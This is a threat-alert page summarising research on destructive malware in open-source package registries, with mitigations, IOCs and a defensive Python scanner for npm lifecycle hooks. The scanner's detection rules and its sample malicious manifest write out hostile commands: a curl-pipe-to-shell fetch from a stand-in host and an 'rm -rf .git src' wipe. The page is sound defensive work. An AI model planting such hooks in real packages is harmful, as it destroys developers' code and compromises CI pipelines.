Perceptive Security
SOC/SIEM Consultancy

Destructive malware is rising across open source registries, using delays and kill switches to wipe code, break builds, and disrupt CI/CD.
Published:
24 December 2025 at 06:24:14
Alert date:
24 December 2025 at 07:02:20
Source:
socket.dev
Supply Chain & Dependencies, Ransomware & Malware
The Socket Threat Research Team observed a steady rise in destructive and sabotage-oriented malware embedded in open source packages across npm, PyPI, NuGet Gallery, and Go module indexes. These packages target developer environments by deleting source code, breaking builds, and wiping repositories. Four main patterns emerged: remote kill switches, time-delayed execution, targeted codebase wiping, and remote payload fetching. Unlike financially motivated campaigns, these attacks aim at operational disruption rather than financial gain. The malware often runs from package lifecycle hooks, so it executes during installation without ever being imported by the consuming project, which lets it propagate across CI/CD pipelines.
Technical details
Four primary destructive patterns were observed:
1) Remote kill switches: malicious packages poll attacker-controlled endpoints for activation commands.
2) Time-delayed execution: destructive payloads execute after fixed delays or on calendar dates.
3) Targeted codebase wiping: selective deletion of Git repositories, source directories, configuration files, and CI build outputs using commands like 'rm -rf'.
4) Remote payload fetching: packages act as loaders that fetch destructive scripts using wget, curl, or HTTP clients.
The malware executes via standard lifecycle hooks during dependency installation and does not require an explicit import. It targets developer environments surgically rather than attempting full system destruction.
Mitigation steps:
Disable unnecessary lifecycle scripts in CI environments.
Enforce strict dependency pinning with provenance checks.
Monitor for unexpected file-system deletion during builds.
Treat any dependency performing recursive delete operations as suspicious.
Prefer established packages with transparent maintainers over newly published alternatives.
Verify dependency provenance to ensure published code matches repository code.
Use Socket's security tools, including the GitHub App, CLI, and browser extension, to detect destructive packages before production deployment.
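The patterns above (recursive deletes, remote fetching, .git targeting, and lifecycle-hook execution) can be checked for before a dependency's install scripts are ever allowed to run. The following scanner is an added example written for this alert; it is not Socket's code or any tool the alert links to. It reads an npm package.json, looks only at the lifecycle hooks npm runs automatically (the hook names are real npm hooks), and applies a set of heuristic rules that are this example's own assumption about what a destructive install script tends to contain. The two manifests at the bottom are constructed test data, not real packages.

```python
import json
import re

# Scripts npm runs automatically around install/uninstall, i.e. the hooks a
# consumer never has to import. A "test" or "build" script is not one of them.
LIFECYCLE_HOOKS = (
    "preinstall", "install", "postinstall", "prepare",
    "prepublish", "preuninstall", "postuninstall",
)

# Heuristic rules (assumption: these are this example's own patterns, not a
# published signature set). Each maps to one of the alert's observed behaviours.
RULES = {
    # targeted codebase wiping: rm -r / rm -rf / rm --recursive / rimraf
    "recursive_delete": re.compile(r"\brm\s+-\w*r\w*\b|\brm\s+--recursive\b|\brimraf\b"),
    # remote payload fetching: curl / wget / PowerShell download helpers / URLs
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://"),
    # .git directory named explicitly (does not match .github or .gitignore)
    "git_target": re.compile(r"\.git\b"),
    # inline or decoded code execution inside a hook
    "obfuscated_exec": re.compile(r"\b(eval|base64|node\s+-e)\b"),
}

# Rules that on their own justify blocking the install rather than just review.
BLOCKING_RULES = {"recursive_delete", "remote_fetch"}


def scan_manifest(manifest):
    """Return a list of findings for every lifecycle hook matching a rule."""
    scripts = manifest.get("scripts") or {}
    name = manifest.get("name", "<unknown>")
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for rule, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append({"package": name, "hook": hook,
                                 "rule": rule, "command": cmd})
    return findings


def scan_manifest_text(text):
    """Convenience wrapper for a raw package.json string."""
    return scan_manifest(json.loads(text))


def verdict(findings):
    """Collapse findings into a CI decision: allow, review, or block."""
    rules = {f["rule"] for f in findings}
    if rules & BLOCKING_RULES:
        return "block"
    if rules:
        return "review"
    return "allow"


# Constructed sample manifests (not real packages).
BENIGN_MANIFEST = {
    "name": "example-native-addon",
    "scripts": {
        "postinstall": "node-gyp rebuild",
        # rm -rf in a non-lifecycle script is normal and must not be flagged
        "test": "rm -rf coverage && jest",
    },
}

SUSPICIOUS_MANIFEST = {
    "name": "example-typosquat",
    "scripts": {
        "preinstall": "curl -s https://example.invalid/p.sh | sh",
        "postinstall": 'rm -rf .git src && node -e "setTimeout(()=>process.exit(0), 1000)"',
    },
}

if __name__ == "__main__":
    for manifest in (BENIGN_MANIFEST, SUSPICIOUS_MANIFEST):
        findings = scan_manifest(manifest)
        print(manifest["name"], "->", verdict(findings))
        for f in findings:
            print(f"  {f['hook']}: {f['rule']}  [{f['command']}]")
```

Run it over every package.json under node_modules after a dry-run install, or over the tarball contents before installing, and fail the pipeline on "block". It complements rather than replaces the first mitigation step: running `npm ci --ignore-scripts` (or setting `ignore-scripts=true` in the project's .npmrc) stops the hooks from executing at all, and the scanner then tells you which packages would have needed them.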
Affected products:
npm packages
PyPI packages
NuGet Gallery packages
Go modules
React framework projects
Vue framework projects
Vite framework projects
WhatsApp development tooling
passlib library (typosquatted)
chalk package (typosquatted)
chokidar package (typosquatted)
Related links:
https://socket.dev/blog/destructive-npm-packages-enable-remote-system-wipe
https://socket.dev/blog/malicious-npm-packages-target-whatsapp-developers-with-remote-kill-switch
https://socket.dev/blog/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads
https://socket.dev/blog/malicious-npm-packages-target-react-vue-and-vite-ecosystems-with-destructive-payloads
https://socket.dev/blog/wget-to-wipeout-malicious-go-modules-fetch-destructive-payload
https://socket.dev/blog/malicious-python-package-typosquats-popular-passlib-library
https://socket.dev/blog/npm-package-wipes-codebases-with-remote-trigger
https://socket.dev/blog/kill-switch-hidden-in-npm-packages-typo-squatting-chalk-and-chokidar
https://socket.dev/blog/2025-blockchain-and-cryptocurrency-threat-report
https://socket.dev/features/github
https://socket.dev/features/cli
https://chromewebstore.google.com/detail/socket-security/jbcobpbfgkhmjfpjjepkcocalmpkiaop?pli=1
https://socket.dev/blog/socket-mcp
Related CVEs:
Related threat actors:
IOCs:
Packages polling remote endpoints for activation signals
Recursive delete commands targeting developer directories
Time-delayed destructive behavior after installation
Packages fetching remote scripts using wget/curl
Targeting of .git repositories and framework-specific directories
Lifecycle hooks executing destructive payloads during installation
Typosquatted package names similar to popular libraries
This article was created with the assistance of AI technology by Perceptive.
